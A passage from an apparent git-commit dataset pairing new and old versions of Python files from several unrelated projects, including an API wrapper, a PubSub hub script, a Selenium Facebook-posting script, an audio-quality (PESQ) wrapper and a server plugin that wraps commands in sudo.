self.energy_100g = NutrientData.objects.get(food=food, nutrient=energy_nutrient).nutrient_value
self.data_cache = {}
@property
def calories(self):
return self._calories
@calories.setter
def calories(self, val):
self._calories = val
self._grams = 100.0 * val / self.energy_100g
@property
def grams(self):
return self._grams
@grams.setter
def grams(self, val):
self._calories = self.energy_100g * val / 100.0
self._grams = val
@property
def totalfat_g(self):
return self._nutrient_amount(TOTAL_FAT)
def _nutrient_amount(self, number):
if number not in self.data_cache:
self.data_cache[number] = NutrientData.objects.get(
food=self.food, nutrient__number=number).nutrient_value
return self.data_cache[number] * self.grams / 100.0
| bsd-3-clause | Python |
852220a8eedd86a092072ac3d2563ff3fc6c8bd4 | make Service class inherit from object | JamesGardiner/chwrapper,JamesGardiner/companies-house | chwrapper/services/base.py | chwrapper/services/base.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#Copyright (c) 2015 James Gardiner
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
"""
A base service class for interacting with the Companies House API.
"""
import os
import requests
from .. import __version__
class Service(object):
"""
A base service class for interacting with the Companies House API.
"""
def __init__(self):
self.BASE_URI = "https://api.companieshouse.gov.uk/"
def get_session(self, token=None, env=None):
access_token = (
token or
(env or os.environ).get('CompaniesHouseKey') or
(env or os.environ).get('COMPANIES_HOUSE_KEY'))
session = requests.Session()
session.params.update(access_token=access_token)
# CH API requires a key only, which is passed as the username
session.headers.update(
{'User-Agent': ' '.join(
[self.product_token, requests.utils.default_user_agent()])})
session.auth = (access_token, '')
return session
@property
def product_token(self):
"""A product token for use in User-Agent headers."""
return 'chwrapper/{0}'.format(__version__)
def handle_http_error(self, response, custom_messages=None,
raise_for_status=False):
if not custom_messages:
custom_messages = {}
if response.status_code in custom_messages.keys():
raise requests.exceptions.HTTPError(
custom_messages[response.status_code])
if raise_for_status:
response.raise_for_status()
| #!/usr/bin/python
# -*- coding: utf-8 -*-
#Copyright (c) 2015 James Gardiner
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
"""
A base service class for interacting with the Companies House API.
"""
import os
import requests
from .. import __version__
class Service:
"""
A base service class for interacting with the Companies House API.
"""
def __init__(self):
self.BASE_URI = "https://api.companieshouse.gov.uk/"
def get_session(self, token=None, env=None):
access_token = (
token or
(env or os.environ).get('CompaniesHouseKey') or
(env or os.environ).get('COMPANIES_HOUSE_KEY'))
session = requests.Session()
session.params.update(access_token=access_token)
# CH API requires a key only, which is passed as the username
session.headers.update(
{'User-Agent': ' '.join(
[self.product_token, requests.utils.default_user_agent()])})
session.auth = (access_token, '')
return session
@property
def product_token(self):
"""A product token for use in User-Agent headers."""
return 'chwrapper/{0}'.format(__version__)
def handle_http_error(self, response, custom_messages=None,
raise_for_status=False):
if not custom_messages:
custom_messages = {}
if response.status_code in custom_messages.keys():
raise requests.exceptions.HTTPError(
custom_messages[response.status_code])
if raise_for_status:
response.raise_for_status()
| mit | Python |
e950f905c34b1912973f1639fdf635f67292562e | Add usage example to listemner registration script. | ucla/PushHubCore | pushhub/scripts.py | pushhub/scripts.py | import optparse
import textwrap
import sys
from pyramid.paster import bootstrap
from pyramid.request import Request
from pushhub.worker import notify_subscribers
def process_subscriber_notices():
description = """
Processes subscriber notifications waiting in the queue.
This script is meant to be run as a cron job that will regularly
send out notices of content updates to subscriber callback URLs.
Pass in a paster settings ini file to determine the settings
needed.
"""
usage = "%prog config_uri"
parser = optparse.OptionParser(
usage=usage,
description=textwrap.dedent(description),
)
options, args = parser.parse_args(sys.argv[1:])
if not len(args) >= 1:
print("You must provide a configuration file")
return 2
config_uri = args[0]
request = Request.blank('/', base_url='http://localhost/hub/')
env = bootstrap(config_uri, request=request)
queue = env['root'].notify_queue
notify_subscribers(queue)
env['closer']()
def register_listener():
description = """
Registers a listener URL with the hub. Useful for
'bootstrapping' a hub with a default listener.
Arguments:
config_uri: the pyramid configuration to use for the hub
listener_url: the URl to use as the listener callback
Example usage:
bin/reg_listener etc/paster.ini#pushhub http://localhost/update_feed
"""
usage = "%prog config_uri listener_url"
parser = optparse.OptionParser(
usage=usage,
description=textwrap.dedent(description),
)
options, args = parser.parse_args(sys.argv[1:])
if not len(args) >= 2:
print("You must provide a configuration file and a URL")
return 2
config_uri = args[0]
listener_url = args[1]
request = Request.blank('/', base_url='http://localhost/hub/')
env = bootstrap(config_uri, request=request)
hub = env['root']
hub.register_listener(listener_url)
env['closer']()
| import optparse
import textwrap
import sys
from pyramid.paster import bootstrap
from pyramid.request import Request
from pushhub.worker import notify_subscribers
def process_subscriber_notices():
description = """
Processes subscriber notifications waiting in the queue.
This script is meant to be run as a cron job that will regularly
send out notices of content updates to subscriber callback URLs.
Pass in a paster settings ini file to determine the settings
needed.
"""
usage = "%prog config_uri"
parser = optparse.OptionParser(
usage=usage,
description=textwrap.dedent(description),
)
options, args = parser.parse_args(sys.argv[1:])
if not len(args) >= 1:
print("You must provide a configuration file")
return 2
config_uri = args[0]
request = Request.blank('/', base_url='http://localhost/hub/')
env = bootstrap(config_uri, request=request)
queue = env['root'].notify_queue
notify_subscribers(queue)
env['closer']()
def register_listener():
description = """
Registers a listener URL with the hub. Useful for
'bootstrapping' a hub with a default listener.
Arguments:
config_uri: the pyramid configuration to use for the hub
listener_url: the URl to use as the listener callback
"""
usage = "%prog config_uri listener_url"
parser = optparse.OptionParser(
usage=usage,
description=textwrap.dedent(description),
)
options, args = parser.parse_args(sys.argv[1:])
if not len(args) >= 2:
print("You must provide a configuration file and a URL")
return 2
config_uri = args[0]
listener_url = args[1]
request = Request.blank('/', base_url='http://localhost/hub/')
env = bootstrap(config_uri, request=request)
hub = env['root']
hub.register_listener(listener_url)
env['closer']()
| bsd-3-clause | Python |
34d2d292dc0868aba84d86878300f86524c6fbd2 | Apply Oslo ModelBase to NeutronBase | gkotton/vmware-nsx,gkotton/vmware-nsx | neutron/db/model_base.py | neutron/db/model_base.py | # Copyright (c) 2012 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy.ext import declarative
from sqlalchemy import orm
from neutron.openstack.common.db.sqlalchemy import models
class NeutronBase(models.ModelBase):
"""Base class for Neutron Models."""
__table_args__ = {'mysql_engine': 'InnoDB'}
def __iter__(self):
self._i = iter(orm.object_mapper(self).columns)
return self
def next(self):
n = self._i.next().name
return n, getattr(self, n)
def __repr__(self):
"""sqlalchemy based automatic __repr__ method."""
items = ['%s=%r' % (col.name, getattr(self, col.name))
for col in self.__table__.columns]
return "<%s.%s[object at %x] {%s}>" % (self.__class__.__module__,
self.__class__.__name__,
id(self), ', '.join(items))
class NeutronBaseV2(NeutronBase):
@declarative.declared_attr
def __tablename__(cls):
# NOTE(jkoelker) use the pluralized name of the class as the table
return cls.__name__.lower() + 's'
BASEV2 = declarative.declarative_base(cls=NeutronBaseV2)
| # Copyright (c) 2012 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy.ext import declarative
from sqlalchemy import orm
class NeutronBase(object):
"""Base class for Neutron Models."""
__table_args__ = {'mysql_engine': 'InnoDB'}
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def get(self, key, default=None):
return getattr(self, key, default)
def __iter__(self):
self._i = iter(orm.object_mapper(self).columns)
return self
def next(self):
n = self._i.next().name
return n, getattr(self, n)
def update(self, values):
"""Make the model object behave like a dict."""
for k, v in values.iteritems():
setattr(self, k, v)
def iteritems(self):
"""Make the model object behave like a dict.
Includes attributes from joins.
"""
local = dict(self)
joined = dict([(k, v) for k, v in self.__dict__.iteritems()
if not k[0] == '_'])
local.update(joined)
return local.iteritems()
def __repr__(self):
"""sqlalchemy based automatic __repr__ method."""
items = ['%s=%r' % (col.name, getattr(self, col.name))
for col in self.__table__.columns]
return "<%s.%s[object at %x] {%s}>" % (self.__class__.__module__,
self.__class__.__name__,
id(self), ', '.join(items))
class NeutronBaseV2(NeutronBase):
@declarative.declared_attr
def __tablename__(cls):
# NOTE(jkoelker) use the pluralized name of the class as the table
return cls.__name__.lower() + 's'
BASEV2 = declarative.declarative_base(cls=NeutronBaseV2)
| apache-2.0 | Python |
8c3b22ac6469da923440e053c52d1007d4baf7f7 | Update fb_post.py | umangahuja1/Python | Automation/fb_post.py | Automation/fb_post.py | '''
This script is created to post status on fb from terminal
'''
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.common.exceptions import NoSuchElementException
usr=input('Enter Email Id:')
pwd=input('Enter Password:')
message=input('Enter the message to be posted:')
driver = webdriver.Chrome()
driver.get('https://www.facebook.com/')
print ("Opened facebook...")
sleep(1)
a = driver.find_element_by_id('email')
a.send_keys(usr)
print ("Email Id entered...")
sleep(1)
b = driver.find_element_by_id('pass')
b.send_keys(pwd)
print ("Password entered...")
c = driver.find_element_by_id('loginbutton')
c.click()
print ("Logged In...")
post_box=driver.find_element_by_xpath("//*[@name='xhpc_message']")
post_box.send_keys(message)
sleep(3)
print ("Text entered to be posted")
post_it=driver.find_element_by_xpath("//button[@class='_1mf7 _4jy0 _4jy3 _4jy1 _51sy selected _42ft']")
post_it.click()
print ('Posted')
sleep(5)
driver.quit()
print("Game Over...")
| '''
This script let's you post status on fb from terminal
'''
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.common.exceptions import NoSuchElementException
usr=input('Enter Email Id:')
pwd=input('Enter Password:')
message=input('Enter the message to be posted:')
driver = webdriver.Chrome()
driver.get('https://www.facebook.com/')
print ("Opened facebook...")
sleep(1)
a = driver.find_element_by_id('email')
a.send_keys(usr)
print ("Email Id entered...")
sleep(1)
b = driver.find_element_by_id('pass')
b.send_keys(pwd)
print ("Password entered...")
c = driver.find_element_by_id('loginbutton')
c.click()
print ("Logged In...")
post_box=driver.find_element_by_xpath("//*[@name='xhpc_message']")
post_box.send_keys(message)
sleep(3)
print ("Text entered to be posted")
post_it=driver.find_element_by_xpath("//button[@class='_1mf7 _4jy0 _4jy3 _4jy1 _51sy selected _42ft']")
post_it.click()
print ('Posted')
sleep(5)
driver.quit()
print("Game Over...")
| apache-2.0 | Python |
b2d28a64bb0837dd97e8be7f97f31f88d380f110 | Add TFX support in pydoc (#23960) | chamikaramj/beam,apache/beam,apache/beam,chamikaramj/beam,chamikaramj/beam,chamikaramj/beam,apache/beam,apache/beam,apache/beam,chamikaramj/beam,chamikaramj/beam,chamikaramj/beam,apache/beam,apache/beam,chamikaramj/beam,apache/beam,apache/beam,chamikaramj/beam,chamikaramj/beam,apache/beam,apache/beam | sdks/python/apache_beam/ml/inference/__init__.py | sdks/python/apache_beam/ml/inference/__init__.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" A package with various modules for running inferences and predictions
on models. This package contains support for popular frameworks as well
as an interface for adding unsupported frameworks.
Note: on top of the frameworks captured in submodules below, Beam also has
a supported TensorFlow model handler via the tfx-bsl library. See
https://beam.apache.org/documentation/sdks/python-machine-learning/#tensorflow
for more information on using TensorFlow in Beam.
"""
from apache_beam.ml.inference.base import RunInference
| #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" A package with various modules for running inferences and predictions
on models. This package contains support for popular frameworks as well
as an interface for adding unsupported frameworks.
"""
from apache_beam.ml.inference.base import RunInference
| apache-2.0 | Python |
aaaaa378e0463e83412503ab3eb51809321714d9 | Rename method | mlibrary/image-conversion-and-validation,mlibrary/image-conversion-and-validation | falcom/api/common/read_only_data_structure.py | falcom/api/common/read_only_data_structure.py | # Copyright (c) 2017 The Regents of the University of Michigan.
# All Rights Reserved. Licensed according to the terms of the Revised
# BSD License. See LICENSE.txt for details.
class ReadOnlyDataStructure:
auto_properties = ( )
__subclasses = set()
def __init__ (self, **kwargs):
self.__set_read_only_data(kwargs)
self.__generate_property_methods()
def get (self, key, default = None):
return self.__read_only_data.get(key, default)
def __bool__ (self):
return bool(self.__read_only_data)
def __repr__ (self):
dictstr = [self.__class__.__name__]
for key, value in self.__read_only_data.items():
dictstr.append("{}={}".format(key, repr(value)))
return "<{}>".format(" ".join(dictstr))
def __set_read_only_data (self, kwargs):
self.__read_only_data = kwargs
self.__remove_null_keys()
def __remove_null_keys (self):
null_keys = self.__independent_list_of_null_keys()
for key in null_keys:
del self.__read_only_data[key]
def __independent_list_of_null_keys (self):
return [k for k, v in self.__read_only_data.items()
if v is None]
def __generate_property_methods (self):
if self.__class__ not in self.__subclasses:
self.__subclasses.add(self.__class__)
self.__add_each_auto_property()
def __add_each_auto_property (self):
for p in self.auto_properties:
self.__examine_then_add_auto_property(p)
def __examine_then_add_auto_property (self, prop):
if isinstance(prop, tuple):
self.__add_auto_property(*prop)
else:
self.__add_auto_property(prop)
def __add_auto_property (self, prop_name, default = None):
def getp (self):
return self.get(prop_name, default)
setattr(self.__class__, prop_name, property(getp))
| # Copyright (c) 2017 The Regents of the University of Michigan.
# All Rights Reserved. Licensed according to the terms of the Revised
# BSD License. See LICENSE.txt for details.
class ReadOnlyDataStructure:
auto_properties = ( )
__subclasses = set()
def __init__ (self, **kwargs):
self.__set_read_only_data(kwargs)
self.__create_auto_properties()
def get (self, key, default = None):
return self.__read_only_data.get(key, default)
def __bool__ (self):
return bool(self.__read_only_data)
def __repr__ (self):
dictstr = [self.__class__.__name__]
for key, value in self.__read_only_data.items():
dictstr.append("{}={}".format(key, repr(value)))
return "<{}>".format(" ".join(dictstr))
def __set_read_only_data (self, kwargs):
self.__read_only_data = kwargs
self.__remove_null_keys()
def __remove_null_keys (self):
null_keys = self.__independent_list_of_null_keys()
for key in null_keys:
del self.__read_only_data[key]
def __independent_list_of_null_keys (self):
return [k for k, v in self.__read_only_data.items()
if v is None]
def __create_auto_properties (self):
if self.__class__ not in self.__subclasses:
self.__subclasses.add(self.__class__)
self.__add_each_auto_property()
def __add_each_auto_property (self):
for p in self.auto_properties:
self.__examine_then_add_auto_property(p)
def __examine_then_add_auto_property (self, prop):
if isinstance(prop, tuple):
self.__add_auto_property(*prop)
else:
self.__add_auto_property(prop)
def __add_auto_property (self, prop_name, default = None):
def getp (self):
return self.get(prop_name, default)
setattr(self.__class__, prop_name, property(getp))
| bsd-3-clause | Python |
d1fd32946ba422e8f240bd44bffab3107f4d1057 | Return the emoji and format it | michaeljoseph/pymoji,michaeljoseph/pymoji | pymoji/__init__.py | pymoji/__init__.py | """Emits HTML from emoji"""
__author__ = 'Michael Joseph'
__email__ = 'michaeljoseph@gmail.com'
__url__ = 'https://github.com/michaeljoseph/pymoji'
__version__ = '0.0.1'
from .emoji import emoji
def pymoji(text):
if text[0] <> text[:-1] and text[0] <> ':':
text = ':%s:' % text
return emoji(text)
| """Python Library Boilerplate contains all the boilerplate you need to create a Python package."""
__author__ = 'Michael Joseph'
__email__ = 'michaeljoseph@gmail.com'
__url__ = 'https://github.com/michaeljoseph/pymoji'
__version__ = '0.0.1'
def pymoji():
return 'Hello World!'
| apache-2.0 | Python |
0768cba738b3e044930e2d201c7c3705396433a2 | fix bugs when ref or deg is all-zero array | vBaiCai/python-pesq | pypesq/__init__.py | pypesq/__init__.py | import numpy as np
from pesq_core import _pesq
from math import fabs
EPSILON = 1e-6
def pesq(ref, deg, fs=16000, normalize=False):
'''
params:
ref: ref signal,
deg: deg signal,
fs: sample rate,
'''
ref = np.array(ref, copy=True)
deg = np.array(deg, copy=True)
if normalize:
ref = ref/np.max(np.abs(ref)) if np.abs(ref) > EPSILON else ref
deg = deg/np.max(np.abs(deg)) if np.abs(deg) > EPSILON else deg
max_sample = np.max(np.abs(np.array([ref, deg])))
if max_sample > 1:
c = 1 / max_sample
ref = ref * c
deg = deg * c
if ref.ndim != 1 or deg.ndim != 1:
raise ValueError("signals must be 1-D array ")
if fs not in [16000, 8000]:
raise ValueError("sample rate must be 16000 or 8000")
if fabs(ref.shape[0] - deg.shape[0]) > fs / 4:
raise ValueError("ref and deg signals should be in same length.")
if np.count_nonzero(ref==0) == ref.size:
raise ValueError("ref is all zeros, processing error! ")
if np.count_nonzero(deg==0) == deg.size:
raise ValueError("deg is all zeros, pesq score is nan! ")
if ref.dtype != np.int16:
ref *= 32767
ref = ref.astype(np.int16)
if deg.dtype != np.int16:
deg *= 32767
deg = deg.astype(np.int16)
score = _pesq(ref, deg, fs)
return score
| import numpy as np
from pesq_core import _pesq
from math import fabs
def pesq(ref, deg, fs=16000, normalize=False):
'''
params:
ref: ref signal,
deg: deg signal,
fs: sample rate,
'''
ref = np.array(ref, copy=True)
deg = np.array(deg, copy=True)
if normalize:
ref = 0.95 * ref/np.max(np.abs(ref))
deg = 0.95 * deg/np.max(np.abs(deg))
max_sample = np.max(np.abs(np.array([ref, deg])))
if max_sample > 1:
c = 1 / max_sample * 0.95
ref = ref * c
deg = deg * c
if ref.ndim != 1 or deg.ndim != 1:
raise ValueError("signals must be 1-D array ")
if fs not in [16000, 8000]:
raise ValueError("sample rate must be 16000 or 8000")
if fabs(ref.shape[0] - deg.shape[0]) > fs / 4:
raise ValueError("ref and deg signals should be in same length.")
if ref.dtype != np.int16:
ref *= 32768
ref = ref.astype(np.int16)
if deg.dtype != np.int16:
deg *= 32768
deg = deg.astype(np.int16)
score = _pesq(ref, deg, fs)
return score
| mit | Python |
676cec59b2a67060e7815a9b8aa79bf276e5c708 | test write from buffer | fayazkhan/secret-diary | test.py | test.py | import sys
from unittest.mock import Mock, patch
import arrow
from diary import create_entry, Entry, main, show, write_from_buffer
def test_show():
content = 'test'
time = arrow.now()
session = Mock(query=Mock(return_value=[Entry(
updated=time, content=content)]))
with patch('diary.display_row') as display_row:
show(session)
display_row.assert_called_once_with(time.humanize(), content)
def test_create_entry():
session = Mock()
entry = create_entry(session, message='test')
session.add.assert_called_once_with(entry)
session.commit.assert_called_once_with()
assert entry.content == 'test'
def test_write_from_buffer():
session = Mock()
buffer = ['hello', 'world']
entry = Entry()
with patch('diary.create_entry', return_value=entry):
write_from_buffer(session, buffer)
assert entry.content == 'helloworld'
@patch('diary.docopt', return_value={'<file>': 'test.db', 'show': True})
@patch('diary.getpass', return_value='password')
@patch('diary.create_database_session')
@patch('diary.show')
def test_main_show(show, create_database_session, *_):
session = create_database_session.return_value
main()
create_database_session.assert_called_once_with('test.db', 'password')
show.assert_called_once_with(session)
@patch('diary.docopt', return_value={
'<file>': 'test.db', 'show': False,
'write': True, '--create': False, '--message': None})
@patch('diary.getpass', return_value='password')
@patch('diary.create_database_session')
@patch('diary.write_from_buffer')
def test_main_write_from_buffer(write_from_buffer,
create_database_session, *_):
session = create_database_session.return_value
main()
write_from_buffer.assert_called_once_with(session, sys.stdin)
| from unittest.mock import Mock, patch
import arrow
from diary import create_entry, Entry, main, show, write_from_buffer
def test_show():
content = 'test'
time = arrow.now()
session = Mock(query=Mock(return_value=[Entry(
updated=time, content=content)]))
with patch('diary.display_row') as display_row:
show(session)
display_row.assert_called_once_with(time.humanize(), content)
def test_create_entry():
session = Mock()
entry = create_entry(session, message='test')
session.add.assert_called_once_with(entry)
session.commit.assert_called_once_with()
assert entry.content == 'test'
def test_write_from_buffer():
session = Mock()
buffer = ['hello', 'world']
entry = Entry()
with patch('diary.create_entry', return_value=entry):
write_from_buffer(session, buffer)
assert entry.content == 'helloworld'
@patch('diary.docopt', return_value={'<file>': 'test.db'})
@patch('diary.getpass', return_value='password')
@patch('diary.create_database_session')
@patch('diary.show')
def test_main_show(show, create_database_session, _):
session = create_database_session.return_value
main()
create_database_session.assert_called_once_with('test.db', 'password')
show.assert_called_once_with(session)
| agpl-3.0 | Python |
4930774acfc33bf9e558f9ff7305bf3f61f90959 | Add shebang to run_dev.py | LandRegistry/digital-register-api,LandRegistry/digital-register-api | run_dev.py | run_dev.py | #!/usr/bin/env python
from service.server import app
import os
app.run(host="0.0.0.0", port=int(os.environ['PORT']), debug=True)
| from service.server import app
import os
app.run(host="0.0.0.0", port=int(os.environ['PORT']), debug=True)
| mit | Python |
0e4bb9bd4aed8f77428c70411a1ce43dab06e9b5 | bump package version | bozzzzo/quark,bozzzzo/quark,bozzzzo/quark,datawire/quark,datawire/quark,bozzzzo/quark,datawire/quark,datawire/datawire-connect,datawire/quark,datawire/quark,datawire/datawire-connect,datawire/datawire-connect,datawire/quark,datawire/datawire-connect | quark/_metadata.py | quark/_metadata.py | # Copyright 2015 datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__"
]
__title__ = "datawire-quark"
__summary__ = "Quark: an IDL for high level (micro)service interfaces"
__uri__ = "http://datawire.github.io/quark/"
__version__ = "0.1.6"
__author__ = "datawire.io"
__email__ = "hello@datawire.io"
__license__ = "Apache License, Version 2.0"
__copyright__ = "2015 %s" % __author__
| # Copyright 2015 datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__"
]
__title__ = "datawire-quark"
__summary__ = "Quark: an IDL for high level (micro)service interfaces"
__uri__ = "http://datawire.github.io/quark/"
__version__ = "0.1.5"
__author__ = "datawire.io"
__email__ = "hello@datawire.io"
__license__ = "Apache License, Version 2.0"
__copyright__ = "2015 %s" % __author__
| apache-2.0 | Python |
b89dd6baf0ea605f63090401375f2f2ee2445a4f | Update utils.py | vitalik/django-ninja,vitalik/django-ninja,vitalik/django-ninja | ninja/signature/utils.py | ninja/signature/utils.py | import asyncio
import inspect
import re
from typing import Any, Callable, Set
from django.urls import register_converter
from django.urls.converters import UUIDConverter
from pydantic.typing import ForwardRef, evaluate_forwardref
from ninja.types import DictStrAny
__all__ = [
"get_typed_signature",
"get_typed_annotation",
"make_forwardref",
"get_path_param_names",
"is_async",
]
def get_typed_signature(call: Callable) -> inspect.Signature:
"Finds call signature and resolves all forwardrefs"
signature = inspect.signature(call)
globalns = getattr(call, "__globals__", {})
typed_params = [
inspect.Parameter(
name=param.name,
kind=param.kind,
default=param.default,
annotation=get_typed_annotation(param, globalns),
)
for param in signature.parameters.values()
]
typed_signature = inspect.Signature(typed_params)
return typed_signature
def get_typed_annotation(param: inspect.Parameter, globalns: DictStrAny) -> Any:
annotation = param.annotation
if isinstance(annotation, str):
annotation = make_forwardref(annotation, globalns)
return annotation
def make_forwardref(annotation: str, globalns: DictStrAny) -> Any:
forward_ref = ForwardRef(annotation)
return evaluate_forwardref(forward_ref, globalns, globalns)
def get_path_param_names(path: str) -> Set[str]:
"""turns path string like /foo/{var}/path/{int:another}/end to set {'var', 'another'}"""
return {item.strip("{}").split(":")[-1] for item in re.findall("{[^}]*}", path)}
def is_async(callable: Callable) -> bool:
return asyncio.iscoroutinefunction(callable)
class NinjaUUIDConverter:
"""Return a path converted UUID as a str instead of the standard UUID"""
regex = UUIDConverter.regex
def to_python(self, value: str) -> str:
return value
def to_url(self, value: Any) -> str:
return str(value)
register_converter(NinjaUUIDConverter, "uuid")
| import asyncio
import inspect
import re
from typing import Any, Callable, ForwardRef, Set
from django.urls import register_converter
from django.urls.converters import UUIDConverter
from pydantic.typing import evaluate_forwardref
from ninja.types import DictStrAny
__all__ = [
"get_typed_signature",
"get_typed_annotation",
"make_forwardref",
"get_path_param_names",
"is_async",
]
def get_typed_signature(call: Callable) -> inspect.Signature:
"Finds call signature and resolves all forwardrefs"
signature = inspect.signature(call)
globalns = getattr(call, "__globals__", {})
typed_params = [
inspect.Parameter(
name=param.name,
kind=param.kind,
default=param.default,
annotation=get_typed_annotation(param, globalns),
)
for param in signature.parameters.values()
]
typed_signature = inspect.Signature(typed_params)
return typed_signature
def get_typed_annotation(param: inspect.Parameter, globalns: DictStrAny) -> Any:
annotation = param.annotation
if isinstance(annotation, str):
annotation = make_forwardref(annotation, globalns)
return annotation
def make_forwardref(annotation: str, globalns: DictStrAny) -> Any:
forward_ref = ForwardRef(annotation)
return evaluate_forwardref(forward_ref, globalns, globalns)
def get_path_param_names(path: str) -> Set[str]:
"""turns path string like /foo/{var}/path/{int:another}/end to set {'var', 'another'}"""
return {item.strip("{}").split(":")[-1] for item in re.findall("{[^}]*}", path)}
def is_async(callable: Callable) -> bool:
return asyncio.iscoroutinefunction(callable)
class NinjaUUIDConverter:
"""Return a path converted UUID as a str instead of the standard UUID"""
regex = UUIDConverter.regex
def to_python(self, value: str) -> str:
return value
def to_url(self, value: Any) -> str:
return str(value)
register_converter(NinjaUUIDConverter, "uuid")
| mit | Python |
43a83c42bca30881d9f26dedbfcc5f71b6d8d389 | make su functionality simpler and clearer | frostyfrog/mark2,SupaHam/mark2,frostyfrog/mark2,SupaHam/mark2 | plugins/su.py | plugins/su.py | from plugins import Plugin
from events import UserInput
import re
class Su(Plugin):
command = "sudo -su {user} -- {command}"
mode = "include"
proc = "ban;unban"
def setup(self):
self.exceptions = re.split("\s*[\;\,]\s*", self.exceptions)
self.register(self.uinput, UserInput)
def uinput(self, event):
handled = False
for p in self.proc.split(";"):
if event.line.startswith(p):
handled = True
break
if (self.mode == 'exclude') ^ handled:
event.line = self.command.format(user=event.user, command=event.line)
| from plugins import Plugin
from events import UserInput
import re
modes = ('raw', 'su')
class Su(Plugin):
command = "sudo -su {user} -- {command}"
default = "raw"
exceptions = ""
def setup(self):
